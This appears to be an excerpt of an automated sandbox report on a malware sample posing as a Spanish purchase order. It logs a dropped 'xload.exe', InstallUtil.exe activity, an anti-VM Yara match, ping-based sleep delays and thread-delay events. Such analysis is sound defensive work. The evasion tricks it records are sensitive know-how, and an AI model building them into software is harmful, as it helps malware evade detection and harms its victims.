Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5652, type: MEMORYSTR

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Memory allocated: 2140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Memory allocated: 24B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 49A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 79E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 89E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 8BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 9BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 9F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: AF10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 4890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 8BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 9BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: 9F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: AF50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Memory allocated: BF50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2B40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4B40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598384	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596946	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596816	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596695	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597901
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594484

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Window / User API: threadDelayed 1421	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Window / User API: threadDelayed 8043	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Window / User API: threadDelayed 2154	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Window / User API: threadDelayed 6871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7774	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Window / User API: threadDelayed 8478	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Window / User API: threadDelayed 789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6679

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe TID: 7852	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 2156	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1912	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe TID: 1004	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 316	Thread sleep count: 2078 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599848s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 316	Thread sleep count: 7774 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599592s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -599046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598608s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598384s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597827s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597499s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597389s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596946s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596816s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595465s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595358s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2984	Thread sleep time: -594921s >= -30000s	Jump to behavior
